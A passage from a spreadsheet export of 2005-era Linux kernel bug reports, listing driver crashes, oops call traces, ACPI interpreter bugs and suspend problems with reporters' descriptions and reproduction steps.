dcd3de00 Call Trace: [&lt;c0308678&gt;] skge_down+0x188/0x1e0 [&lt;c0309f34&gt;] skge_set_mac_address+0x74/0x100 [&lt;c03998b0&gt;] dev_set_mac_address+0x40/0x80 [&lt;c0124ad7&gt;] printk+0x17/0x20 [&lt;e01c1560&gt;] bond_enslave+0x180/0x860 [bonding] [&lt;c0129e17&gt;] local_bh_enable+0x37/0xb0 [&lt;c0411265&gt;] fib6_walk+0x85/0x90 [&lt;e01c44be&gt;] bond_do_ioctl+0x10e/0x310 [bonding] [&lt;c044e01e&gt;] _read_lock+0xe/0xa0 [&lt;c044e36d&gt;] _read_unlock+0xd/0x30 [&lt;c044a38a&gt;] vlan_device_event+0x1a/0x1c0 [&lt;e01c43b0&gt;] bond_do_ioctl+0x0/0x310 [bonding] [&lt;c0399c24&gt;] dev_ifsioc+0x334/0x3a0 [&lt;c0399e87&gt;] dev_ioctl+0x1f7/0x270 [&lt;c03d7edc&gt;] inet_ioctl+0x9c/0xb0 [&lt;c038eb59&gt;] sock_ioctl+0xc9/0x1e0 [&lt;c017f53e&gt;] do_ioctl+0x8e/0xa0 [&lt;c017f735&gt;] vfs_ioctl+0x65/0x1f0 [&lt;c017f905&gt;] sys_ioctl+0x45/0x70 [&lt;c010345b&gt;] sysenter_past_esp+0x54/0x75 Code: c0 84 c0 74 22 85 d2 75 0a 89 c8 83 c4 08 e9 a4 f7 ff ff 89 54 24 04 89 0c 24 e8 88 f1 ff ff 90 8d b4 26 00 00 00 00 83 c4 08 c3 &lt;0f&gt; 0b f6 03 40 f4 47 c0 eb c4 89 f6 85 c0 74 2c 05 00 00 00 40 bonding: Warning : no link monitoring support for eth0 skge eth0: disabling interface Unable to handle kernel NULL pointer dereference at virtual address 00000004 printing eip: c03060a0 *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: bonding CPU: 0 EIP: 0060:[&lt;c03060a0&gt;] Not tainted VLI EFLAGS: 00010282 (2.6.13.1) EIP is at skge_rx_clean+0x10/0x60 eax: 00000000 ebx: 00000000 ecx: 00000001 edx: 00000001 esi: c155564c edi: c1555620 ebp: 00000000 esp: d9f4bda8 ds: 007b es: 007b ss: 0068 Process ifenslave (pid: 680, threadinfo=d9f4a000 task=d9f63a60) Stack: 00000000 c158bd80 00000000 c030862f c1555620 00000000 df43d600 da2f6bf8 00000001 c1555400 d9f4be44 c1555620 c0309f34 c1555400 00000046 00000000 d9f4be44 c1555400 d9f4be4c d9f4be46 c03998b0 c1555400 d9f4be44 c0124ad7 Call Trace: [&lt;c030862f&gt;] skge_down+0x13f/0x1e0 [&lt;c0309f34&gt;] skge_set_mac_address+0x74/0x100 [&lt;c03998b0&gt;] dev_set_mac_address+0x40/0x80 [&lt;c0124ad7&gt;] printk+0x17/0x20 [&lt;e01bf560&gt;] bond_enslave+0x180/0x860 [bonding] [&lt;c011fa37&gt;] __wake_up_locked+0x27/0x30 [&lt;c044e39f&gt;] _spin_unlock_irqrestore+0xf/0x30 [&lt;c010244a&gt;] __down_trylock+0x3a/0x60 [&lt;e01c24be&gt;] bond_do_ioctl+0x10e/0x310 [bonding] [&lt;c044e39f&gt;] _spin_unlock_irqrestore+0xf/0x30 [&lt;c010244a&gt;] __down_trylock+0x3a/0x60 [&lt;c03d51c3&gt;] inet_insert_ifa+0x113/0x150 [&lt;e01c23b0&gt;] bond_do_ioctl+0x0/0x310 [bonding] [&lt;c0399c24&gt;] dev_ifsioc+0x334/0x3a0 [&lt;c0399e87&gt;] dev_ioctl+0x1f7/0x270 [&lt;c03d7edc&gt;] inet_ioctl+0x9c/0xb0 [&lt;c038eb59&gt;] sock_ioctl+0xc9/0x1e0 [&lt;c017f53e&gt;] do_ioctl+0x8e/0xa0 [&lt;c017f735&gt;] vfs_ioctl+0x65/0x1f0 [&lt;c017f905&gt;] sys_ioctl+0x45/0x70 [&lt;c010345b&gt;] sysenter_past_esp+0x54/0x75 Code: 44 24 08 8b 52 04 66 c7 42 18 00 00 66 c7 42 1c 0e 00 0d 00 00 56 c8 89 02 c3 90 56 53 83 ec 04 8b 74 24 10 83 c6 2c 8b 5e 08 90 &lt;8b&gt; 43 04 c7 00 00 00 00 00 8b 53 08 85 d2 74 1e 8b 82 90 00 00 Steps to reproduce: Call "ifenslave bond0 eth0", where eth0 is Yukon rev 1, driven by skge.</t>
  </si>
  <si>
    <t>Multicasting problem in skge (OSPF)</t>
  </si>
  <si>
    <t>2005-09-20 15:47 UTC</t>
  </si>
  <si>
    <t>Damjan Georgievski</t>
  </si>
  <si>
    <t>2006-02-03 15:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: -na- Distribution: Slackware-10.1 Hardware Environment: i386/PC I have a problem with the skge driver on a vanilla 2.6.13 kernel. I have 3 DLink DGE-530T PCI cards in several PC routers, the PCI id is: 01:09.0 Class 0200: 1186:4c00 (rev 11). I use OSPF on the network, so I have quagga-0.98.3 installed on the routers. As you probably know OSPF works by multicasting HELLO messages. At first (after power-up) everything works ok. But after some time of operation (2 days) some (only some) of the ethernet cards would stop receiving the multicast packets, and the router would remove its OSPF neighbour and its routes. Now, the moment I start 'tcpdump' on that interface, and the interface goes in promisc mode, the card suddenly starts to receive the multicast messages and OSPF is established again. I tried to turn on the 'allmulti' option (/sbin/ip link set dev eth1 allmulticast on) but it doesn't make any difference. The problem is not easyly reproducible, I have some 40+ routers with the exact same configuration, and this only happens from time to time on some of them. There's no rule on which router it happens.</t>
  </si>
  <si>
    <t>Incorrect detection of PM-Timer ioport on ASUS a8v</t>
  </si>
  <si>
    <t>2005-09-21 01:08 UTC</t>
  </si>
  <si>
    <t>Jonas Oreland</t>
  </si>
  <si>
    <t>2005-12-05 14:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Hardware Environment: ASUS a8v deluxe Software Environment: Problem Description: I running 2.6.12-gentoo-r10 I have a ASUS a8v motherboard with a AMD64 X2 This gives me problem with clock drift (see http://bugzilla.kernel.org/show_bug.cgi?id=5105) So I tried using notsc to force usage of pm timer. But! The the acpi code find the fadt-&gt;xpm_tmr_blk.address to 0 Making the code yet again fall back to PIT/TSC I booted my system and run perch&gt; grep PM_ /proc/ioports 0808-080b : PM_TMR And harded the address 0x808 into pmtmr_ioport This works. The system is using pmtmr and I get no clock drift (tested now for ~a day) But why do ACPI find 0 as pmtmr_ioport?</t>
  </si>
  <si>
    <t>kernel oops and crash with rtl8110/8169 + vlan</t>
  </si>
  <si>
    <t>2.6.12.6/2.6.13.1/2.6.13.2</t>
  </si>
  <si>
    <t>2005-09-21 03:22 UTC</t>
  </si>
  <si>
    <t>2005-09-25 03:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.2 Distribution: vanilla Hardware Environment: AMD Duron/VIA KT133/Realtek 8110/8169 Software Environment: Problem Description: Kernel oops and kernel panic occurs regularly. Steps to reproduce: Moderate LAN traffic through 8169 NIC with vlan. Kernel oops: Badness in __kfree_skb at net/core/skbuff.c:291 [&lt;c03e2ff1&gt;] __kfree_skb+0xb1/0x100 [&lt;c03e658d&gt;] sk_stream_kill_queues+0x4d/0x180 [&lt;c042e14c&gt;] tcp_v4_destroy_sock+0x1c/0x180 [&lt;c041d4d7&gt;] tcp_destroy_sock+0x47/0x120 [&lt;c042561a&gt;] tcp_rcv_state_process+0x51a/0x9c0 [&lt;c042d1b9&gt;] tcp_v4_do_rcv+0x99/0x120 [&lt;c042d7d0&gt;] tcp_v4_rcv+0x590/0x770 [&lt;c0413c7f&gt;] ip_local_deliver+0xbf/0x1c0 [&lt;c0414260&gt;] ip_local_deliver_finish+0x0/0x130 [&lt;c04140d6&gt;] ip_rcv+0x356/0x4e0 [&lt;c0414390&gt;] ip_rcv_finish+0x0/0x270 [&lt;c01b1165&gt;] pathrelse_and_restore+0x45/0x50 [&lt;c03e88c7&gt;] netif_receive_skb+0x127/0x190 [&lt;c036eeac&gt;] rtl8169_rx_vlan_skb+0x15c/0x1a0 [&lt;c037134a&gt;] rtl8169_rx_interrupt+0x18a/0x400 [&lt;c0371a50&gt;] pci_dma_sync_single_for_device+0x0/0x1 [&lt;c03716cb&gt;] rtl8169_interrupt+0x10b/0x150 [&lt;c01385a0&gt;] handle_IRQ_event+0x30/0x70 [&lt;c0138682&gt;] __do_IRQ+0xa2/0xe0 [&lt;c0448056&gt;] tcp_in_window+0x496/0x4a0 [&lt;c0104d79&gt;] do_IRQ+0x19/0x30 [&lt;c0103292&gt;] common_interrupt+0x1a/0x20 [&lt;c0139ad6&gt;] find_get_page+0x26/0x30 [&lt;c0158373&gt;] __find_get_block_slow+0x53/0x170 [&lt;c044a1c1&gt;] ipt_do_table+0x251/0x330 [&lt;c0159190&gt;] __find_get_block+0x80/0xe0 [&lt;c0159227&gt;] __getblk+0x37/0x70 [&lt;c01b15f7&gt;] search_by_key+0x97/0xd80 [&lt;c03edbfc&gt;] neigh_resolve_output+0xec/0x190 [&lt;c0416c6e&gt;] ip_finish_output+0xfe/0x220 [&lt;c041730a&gt;] ip_queue_xmit+0x36a/0x510 [&lt;c0419300&gt;] dst_output+0x0/0x30 [&lt;c019aab9&gt;] make_cpu_key+0x59/0x70 [&lt;c019cfad&gt;] inode2sd+0xfd/0x160 [&lt;c012cc20&gt;] autoremove_wake_function+0x0/0x60 [&lt;c019aab9&gt;] make_cpu_key+0x59/0x70 [&lt;c019d326&gt;] reiserfs_update_sd_size+0xa6/0x220 [&lt;c0139b3f&gt;] find_lock_page+0x1f/0x90 [&lt;c019aab9&gt;] make_cpu_key+0x59/0x70 [&lt;c01a8424&gt;] reiserfs_dirty_inode+0x74/0x90 [&lt;c01a2365&gt;] reiserfs_submit_file_region_for_write+0x215/0x280 [&lt;c01a3342&gt;] reiserfs_file_write+0x4f2/0x690 [&lt;c0414260&gt;] ip_local_deliver_finish+0x0/0x130 [&lt;c04140d6&gt;] ip_rcv+0x356/0x4e0 [&lt;c0414390&gt;] ip_rcv_finish+0x0/0x270 [&lt;c03e88c7&gt;] netif_receive_skb+0x127/0x190 [&lt;c036eeac&gt;] rtl8169_rx_vlan_skb+0x15c/0x1a0 [&lt;c03713a9&gt;] rtl8169_rx_interrupt+0x1e9/0x400 [&lt;c03716b5&gt;] rtl8169_interrupt+0xf5/0x150 [&lt;c0156ad7&gt;] vfs_write+0xa7/0x180 [&lt;c0156c81&gt;] sys_write+0x51/0x80 [&lt;c01030d5&gt;] syscall_call+0x7/0xb The rtl8169 is eth2 here and has vlans eth2.2 through eth2.10 VLAN setup is done by the following basic script: ============================= #!/bin/zsh VC=/sbin/vconfig ETH=eth2 for i in {2..10}; do ${VC} add ${ETH} $i ip ad add 192.168.$i.254 dev eth2.$i ip li set eth2.$i up ip ro add 192.168.$i.0/24 dev eth2.$i done ============================ I also experience dead loop/fix it messages from time to time. (Only ono one specific vlan, not all!)</t>
  </si>
  <si>
    <t>dcache of parent fids causing problems for synthetics</t>
  </si>
  <si>
    <t>2.6.16-rc4</t>
  </si>
  <si>
    <t>2005-09-21 06:37 UTC</t>
  </si>
  <si>
    <t>2006-03-02 18:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: I've just observed that the v9fs (well, linux vfs really) is caching directory entries. This is causing hurt :-) e.g. program opens /mnt/9/clone, server returns fid for /mnt/9/0/ctl, program leaves /mnt/9/0/ctl open and forks a shell. So we have: program with open file for /mnt/9/0/ctl, and child shell which can do things to /mnt/9/0/ctl, /mnt/9/0/other files. child shell exits. Server gets clunks for /mnt/9/0/ctl. But server never gets a clunk for /mnt/9/0! The clunk only happens on unmount. So from the server's point of view, the /mnt/9/0 directory should remain there. I want it gone, however, once the last file in /mnt/9/0 is closed. Linux is foiling me. Hmm, is there a fix for this in the vfs layer?</t>
  </si>
  <si>
    <t>OOPs encountered while running JFS file system stress</t>
  </si>
  <si>
    <t>2.6.13-mm2</t>
  </si>
  <si>
    <t>2005-09-21 06:58 UTC</t>
  </si>
  <si>
    <t>2005-09-23 06:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13-rc6-mm1 --------------------------------------- Distribution: SLES 9 --------------------------------------- Hardware Environment: SMP, 2 way Xeon TM 2.8GHz, 1.5G RAM Network Interface (Tigon3) Disk I/O SCSI storage controller: IBM server RAID --------------------------------------- Software Environment: Linux x235b 2.6.13-mm2-II #1 PREEMPT Mon Sep 12 09:02:38 PDT 2005 i686 i686 i386 GNU/Linux --------------------------------------- Problem Description: On Running File System stress test on JFS File System encountered this OOPs message ...I have captured memory dump and will attach a preliminary analysis report to this bug x235b!login: Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC last sysfs file: /kernel/crash_notes Modules linked in: CPU: 1 EIP: 0060:[&lt;c0250813&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.13-mm2-I) EIP is at txUpdateMap+0x83/0x290 eax: e0739258 ebx: f898a590 ecx: f8871228 edx: 00000910 esi: 00000001 edi: f898a580 ebp: f78eff6c esp: f78eff34 ds: 007b es: 007b ss: 0068 Process jfsCommit (pid: 210, threadinfo=f78ee000 task=c5d980b0) Stack: 00000000 00000003 d9a39480 f885e3d0 00000000 00000010 e134edc4 00000000 d9a39480 00000000 f78eff74 f8871228 00000286 f8871228 f78eff84 c0251113 f8871228 c06cb180 00000286 f8871228 f78effe4 c0251318 f8871228 f78eff98 Call Trace: [&lt;c0103fbb&gt;] show_stack+0xab/0xc0 [&lt;c0104156&gt;] show_registers+0x166/0x1e0 [&lt;c0104392&gt;] die+0x122/0x1c0 [&lt;c049aecc&gt;] do_page_fault+0x3dc/0x61d [&lt;c0103c33&gt;] error_code+0x4f/0x54 [&lt;c0251113&gt;] txLazyCommit+0x23/0xe0 [&lt;c0251318&gt;] jfs_lazycommit+0x148/0x200 [&lt;c01012a9&gt;] kernel_thread_helper+0x5/0xc --------------------------- | preempt count: 00000001 ] | 1 level deep critical section nesting: ---------------------------------------- .. [&lt;c0499f59&gt;] .... _spin_lock_irqsave+0x19/0xa0 .....[&lt;c01042b3&gt;] .. ( &lt;= die+0x43/0x1c0)</t>
  </si>
  <si>
    <t>Kernel Panic during SysRq-b on Alpha EV56</t>
  </si>
  <si>
    <t>2005-09-21 12:31 UTC</t>
  </si>
  <si>
    <t>2005-09-22 03:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Didn't try any earlier kernel Distribution: Debian Testing Hardware Environment: Alpha EV56 Steps to reproduce: SysRq-b called from a serial line console gives the following panic. Similar panic occurs if SysRq-b is called from the main console. SysRq : Resetting Kernel bug at kernel/printk.c:683 swapper(0): Kernel Bug 1 pc = [&lt;fffffc000032706c&gt;] ra = [&lt;fffffc00004352d4&gt;] ps = 0007 Not tainted pc is at acquire_console_sem+0x2c/0x90 ra is at take_over_console+0x74/0x500 v0 = 0000000000000007 t0 = 000000000fffff00 t1 = 0000000000010000 t2 = fffffc0000002240 t3 = 0000000000000000 t4 = 000000000000000d t5 = 000000000000000e t6 = ffffffffffffe051 t7 = fffffc000059c000 a0 = fffffc00005022c0 a1 = 0000000000000000 a2 = 000000000000003e a3 = 0000000000000001 a4 = 0000000000000001 a5 = 0000000000000005 t8 = 000000000000001f t9 = fffffc00004038d0 t10= 0000000000000000 t11= 000000000000000a pv = fffffc0000327040 at = 0000000000000000 gp = fffffc0000648e00 sp = fffffc000059fbc0 Trace: [&lt;fffffc00004352d4&gt;] take_over_console+0x74/0x500 [&lt;fffffc0000312de8&gt;] common_shutdown_1+0x78/0x130 [&lt;fffffc0000312ec0&gt;] common_shutdown+0x20/0x30 [&lt;fffffc00004372f4&gt;] __handle_sysrq+0xd4/0x200 [&lt;fffffc0000441398&gt;] receive_chars+0x1e8/0x330 [&lt;fffffc000044197c&gt;] serial8250_interrupt+0x12c/0x130 [&lt;fffffc0000315dfc&gt;] handle_IRQ_event+0x6c/0xf0 [&lt;fffffc00003167a0&gt;] handle_irq+0xd0/0x180 [&lt;fffffc000031f530&gt;] miata_srm_device_interrupt+0x30/0x50 [&lt;fffffc0000316d64&gt;] do_entInt+0xf4/0x140 [&lt;fffffc0000311140&gt;] ret_from_sys_call+0x0/0x10 [&lt;fffffc0000312ce0&gt;] default_idle+0x0/0x10 [&lt;fffffc0000312d48&gt;] cpu_idle+0x58/0x80 [&lt;fffffc0000312ce0&gt;] default_idle+0x0/0x10 [&lt;fffffc0000312ce0&gt;] default_idle+0x0/0x10 [&lt;fffffc00003100a4&gt;] rest_init+0x44/0x60 [&lt;fffffc000031001c&gt;] __start+0x1c/0x20 Code: 2021ff00 b53e0008 a0480064 44410002 e4400004 00000081 &lt;000002ab&gt; 0050944f Kernel panic - not syncing: Aiee, killing interrupt handler!</t>
  </si>
  <si>
    <t>2.6.14-rc2</t>
  </si>
  <si>
    <t>James Boddington</t>
  </si>
  <si>
    <t>Failure to start nfs server</t>
  </si>
  <si>
    <t>2.6.14-rc2-mm1</t>
  </si>
  <si>
    <t>2005-09-23 06:53 UTC</t>
  </si>
  <si>
    <t>2006-02-15 14:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13-rc6-mm1 ------------------------------------------------------------- Distribution: SLES 9 SP1 ------------------------------------------------------------- Hardware Environment: SMP, 2 way Xeon TM 2.8GHz, 1.5G RAM Network Interface (Tigon3) Disk I/O SCSI storage controller: IBM server RAID ------------------------------------------------------------- Software Environment: Linux x235b 2.6.14-rc2-mm1-I #1 SMP PREEMPT Thu Sep 22 08:13:49 PDT 2005 i686 i686 i386 GNU/Linux ------------------------------------------------------------- Problem Description: This is the Same failure discussed earlier in mailing list http://www.uwsg.iu.edu/hypermail/linux/kernel/0509.2/0264.html where on starting the nfsserver it is comming out with failure. I observed the problem with 2.6.14-rc1-mm1 as well as in 2.6.14-rc2-mm1 kernels. The kernel configuration file has NFS support enabled and I dont see any problem from that side. While observing the strace output in both 2.6.14-rc2-mm1 and 2.6.13-rc6-mm1 I see in 2.6.14-rc2-mm1 some extra calls for fcntl before it gives out failure message during write. This is the part of that strace out put fcntl64(1, F_GETFD)= 0 fcntl64(1, F_DUPFD, 10)= 10 fcntl64(1, F_GETFD)= 0 fcntl64(10, F_SETFD, FD_CLOEXEC)= 0 dup2(2, 1)= 1 fcntl64(2, F_GETFD)= 0 write(1, "\0337\33[?25l\r\33[104C\33[10D\33[1;31m faile"..., 4^M</t>
  </si>
  <si>
    <t>AMD64 Erratum: Should not enable C2 when using APIC</t>
  </si>
  <si>
    <t>2.6.12, 2.6.13.2</t>
  </si>
  <si>
    <t>2005-09-24 06:27 UTC</t>
  </si>
  <si>
    <t>Bertro Simul</t>
  </si>
  <si>
    <t>2008-01-09 12:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: Gentoo Hardware Environment: Athlon 64 3500+ Problem Description: The document at http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/25759.pdf?info=EXLINK says in section 78:</t>
  </si>
  <si>
    <t>when booting without pci=routeirq, kacpid eats 100% cpu time - AC450NX</t>
  </si>
  <si>
    <t>2005-09-26 00:40 UTC</t>
  </si>
  <si>
    <t>Bruno Redondi</t>
  </si>
  <si>
    <t>2007-03-07 23:18 UTC</t>
  </si>
  <si>
    <t>Bjorn Helgaas</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: the last without pci=routeirq parameter Distribution: Gentoo Linux Hardware Environment: Intel AC450NX 4xPIII 4Gb Ram Software Environment: Problem Description: When I boot without the "pci=routeirq" parameter the kacpid process eats completly one cpu; when i pass "pci=routeirq" parameter the system runs fine. Steps to reproduce: boot without the parameter</t>
  </si>
  <si>
    <t>Jiri Slaby</t>
  </si>
  <si>
    <t>Overlapping mtrr regions</t>
  </si>
  <si>
    <t>2.6.15-rc2</t>
  </si>
  <si>
    <t>2005-09-27 11:44 UTC</t>
  </si>
  <si>
    <t>Erik Andr</t>
  </si>
  <si>
    <t>2007-09-09 08:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: Slackware-current Hardware Environment: Dell c640, Pentium4m 2 GHz, 512 MB DDR Problem Description: I frequently get the following messages when checking the kernel log: mtrr: 0xe0000000,0x8000000 overlaps existing 0xe0000000,0x2000000 mtrr: 0xe0000000,0x8000000 overlaps existing 0xe0000000,0x2000000 mtrr: 0xe0000000,0x8000000 overlaps existing 0xe0000000,0x2000000 I don't know if it makes any performance difference or not though. Steps to reproduce: Just boot the kernel.</t>
  </si>
  <si>
    <t>Datacorruption on forcedeth-nic</t>
  </si>
  <si>
    <t>2.6.13+</t>
  </si>
  <si>
    <t>2005-09-27 12:03 UTC</t>
  </si>
  <si>
    <t>Johan van Baarlen</t>
  </si>
  <si>
    <t>2005-10-12 12:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.5 Distribution: FC3 Hardware Environment: x86_64 Software Environment: x86_64 Hardware: Asus A8N-E, dualcore AthlonX2-4400+ or 4600+, 4G ram, with and without 4G-remap. NIC: NForce4 embedded. Driver: forcedeth When reading gigabytes of data at fullspeed from NFS-server (8k [rw]size over UDP), data is not consistent - every run gives a different md5sum on the same file. Filecontents is irrelevant, happens with all-zero file too (so it is not just a simple misorder of udp-packets but actual corruption - data is completely unrecognizable when corrupt) Copying data to the affected system from Windows-client (Samba, TCP) produces corruption too, so I'm guessing the problem is not related to protocol but a problem with the receive-buffer of the forcedeth-driver. Kernel 2.6.12.5 behaved properly, several Terabytes transferred with identical md5sum everytime. Kernel 2.6.13 and later (tested up to 2.6.13.2) produce bad md5sums, no pattern found, but corruption seems to occur not very often and in blocks - rough estimate about two kilobyte per gigabyte transferred, will investigate further when I have time. Internal reproducibility is 100%, but could be specific to combination of server/client - from two servers, only one (the oldest and 'slowest') shows corruption. The other, transferring up to an impressive 105Mbyte/second, has not shown any corruption yet. It is not a serverside-issue though, all other clients (UP and SMP, x86 and x86_64, 3Com, Broadcom and Intel-nics, kernels up to 2.6.12.5) are fine. Summarizing: NForce4-based systems with 2.6.13+ and dualcore-Athlon64 show corruption. NForce4-based with same dualcore proc and kernels &lt;=2.6.12.5 are fine. NForce4, 2.6.12.5, singlecore - no problem. Preemption has changed in 2.6.13+, but my 2.6.12.5 uses preempt, and 2.6.13+ uses server-preemption - should be functionally identical. Kernelfrequency is set to 250Hz in all 2.6.13+, tested 1000Hz as well but no difference. Things I can and will test firther to isolate this bugger as soon as I am able to do so (depends on hardware-availability): * NForce4-system, singlecore, 2.6.13.2 (will find s939-singlecore cpu for test) * True SMP-system (quad-Opteron), broadcom-nic, 2.6.13.2-kernel * NForce4-system, dualcore Athlon64, Intel Gbit-nic I'm guessing the problem is quite specific to forcedeth, but better knowing for sure than guessing wrong.</t>
  </si>
  <si>
    <t>Workaround for undeclared Z00X objects in Package declarations</t>
  </si>
  <si>
    <t>2005-09-28 05:11 UTC</t>
  </si>
  <si>
    <t>Some DSDTs have Package declarations like: Name (PBST, Package (0x04) { 0x00, Z007, Z007, 0x2710 }) or Name (PBST, Package (0x04) { 0x00, Z00G, Z00G, 0x2710 }) The Z00X objects are never declared and therefore the whole _BST function to read battery state fails.</t>
  </si>
  <si>
    <t>Crash while processing the global level execution exception</t>
  </si>
  <si>
    <t>2005-09-29 04:58 UTC</t>
  </si>
  <si>
    <t>Valery A Podrezov</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the gr.asl demo code attached.</t>
  </si>
  <si>
    <t>Access to FieldObject element of Package causes exception</t>
  </si>
  <si>
    <t>2005-09-29 09:05 UTC</t>
  </si>
  <si>
    <t>2007-12-05 19:36 UTC</t>
  </si>
  <si>
    <t>Lin Ming</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the .asl demo code attached below.</t>
  </si>
  <si>
    <t>String to Integer conversion contradicts new April 2005 Conversion Rules</t>
  </si>
  <si>
    <t>2005-09-29 10:13 UTC</t>
  </si>
  <si>
    <t>b44 driver locks the kernel 2.6.13.2 upon load</t>
  </si>
  <si>
    <t>2.6.13.2</t>
  </si>
  <si>
    <t>2005-09-29 10:45 UTC</t>
  </si>
  <si>
    <t>Michal Palczewski</t>
  </si>
  <si>
    <t>2005-12-28 14:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: debian unstable Hardware Environment: dell inspiron 9300 Software Environment: gnome Problem Description: If I let my system come up normally it locks while starting the mta. Other net systems come up fine. If I start in single user mode it locks sooner after going to multi user mode. If I don't let the b44 driver load. system works fine until I insmod the driver then immediatly the system freezes. If I let the b44 driver load and then #ifconfig eth0 up #ifconfig eth0 down #rmmod b44 I can then later insmod it and it works fine This started happening after I removed ifd and shutdown the computer without running ifdown eth0. I removed ifd because it didn't work with this driver, but that might be another bug.</t>
  </si>
  <si>
    <t>No exception when Serialized Method is run after the higher level mutex acquiring</t>
  </si>
  <si>
    <t>2007-01-15 08:50 UTC</t>
  </si>
  <si>
    <t>detection of generic ps/2 mouse instead of appropriate touchscreen on some Fujitsu Lifebook B142 models</t>
  </si>
  <si>
    <t>2005-09-30 06:24 UTC</t>
  </si>
  <si>
    <t>Daniele Gozzi</t>
  </si>
  <si>
    <t>2006-01-30 08:49 UTC</t>
  </si>
  <si>
    <t>Two the same fragments of code should be compacted to one</t>
  </si>
  <si>
    <t>2005-09-30 06:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Improve code of interpreter. Steps to reproduce: Doesn't require.</t>
  </si>
  <si>
    <t>S4 regression: suspend sometimes hangs - Dell Dimension 5100</t>
  </si>
  <si>
    <t>2005-09-30 07:17 UTC</t>
  </si>
  <si>
    <t>2006-02-01 06:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none tested after 2.6.13.2 Distribution: Debian Sarge Hardware Environment: Dell Dimension 5100, P4 2.8 GHz, Intel 945G, ICH7, SATA hardddrive ATI Radeon X300 SE (RV 370) PCI express graphic card Software Environment: Debian Sarge with KDE 3.3.2 and X.org backport (6.8.2.dfsg.1-5 from www.backports.org), or just gdm or a simple vesa framebuffer console. Some custom made ACPI shutdown script, but Also tried with echo platform &gt; /sys/power/disk ; echo disk &gt; /sys/power/state as well as echo shutdown &gt; /sys/power/disk ; echo disk &gt; /sys/power/state I used GRUB bootloader with following configuration: title Debian GNU/Linux, kernel 2.6.13.2-dell-dimension root (hd0,5) kernel /boot/vmlinuz-2.6.13.2-dell-dimension root=/dev/sda6 resume=/dev/sda5 vga=791 ro savedefault boot Problem Description: Out of about 10-15 tries with different circumstances (KDE, gdm, X.org with "radeon" and with "vesa" driver, framebuffer console without running X server, ACPI script, just above command sequences) the system only went into suspend correctly once. This was with framebuffer console and the platform command sequence - resume worked okay on this one case I could not reproduce afterwards. All the other times it hung after Writing data to swap (xxxxx pages) Giving messages like: ata1: command 0x35 timeout, stat 0x50, host stat 0x24 ata1: command 0x35 timeout, stat 0x50, host stat 0x24 ata1: command 0x25 timeout, stat 0x50, host stat 0x24 ata1: command 0x25 timeout, stat 0x50, host stat 0x24 It takes about half a minute or minute for each message to appear. It then went on with "command 0x25 timeout" message, I waited about 5 minutes or so. When rebooting the system starts as if didn't suspended, so it doesn't seem that the memory image was written to disk. Steps to reproduce: 1) compile plain vanilla 2.6.13.2 with the config file I will attach 2) have a similar hardware (see above and attached lshal and lspci outputs for details) 3) boot up Debian Sarge with said kernel (I think any other Linux distribution will do) 4) go into a console (I didn't test without the vga=791 parameter, if you need that test, please let me know) 5) type "echo platform &gt; /sys/power/disk ; echo disk &gt; /sys/power/state" or "echo shutdown &gt; /sys/power/disk ; echo disk &gt; /sys/power/state"</t>
  </si>
  <si>
    <t>include/linux/mod_devicetables.h has incorrect #if</t>
  </si>
  <si>
    <t>2005-09-30 20:32 UTC</t>
  </si>
  <si>
    <t>David 'Bombe' Roden</t>
  </si>
  <si>
    <t>2005-10-04 14:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: Gentoo 2005.0 Hardware Environment: i686 Software Environment: 2.6.12 Problem Description: mod_devicetables.h has in incorrect #if in line 186: #if __KERNEL__ That should really be #ifdef __KERNEL__. Steps to reproduce:</t>
  </si>
  <si>
    <t>Module with names such as current and init_stack  show a different name(expand to their respective definitions) when listed with lsmod</t>
  </si>
  <si>
    <t>2005-09-30 23:43 UTC</t>
  </si>
  <si>
    <t>Thayumanavar Sachithanantham</t>
  </si>
  <si>
    <t>2006-01-20 15:14 UTC</t>
  </si>
  <si>
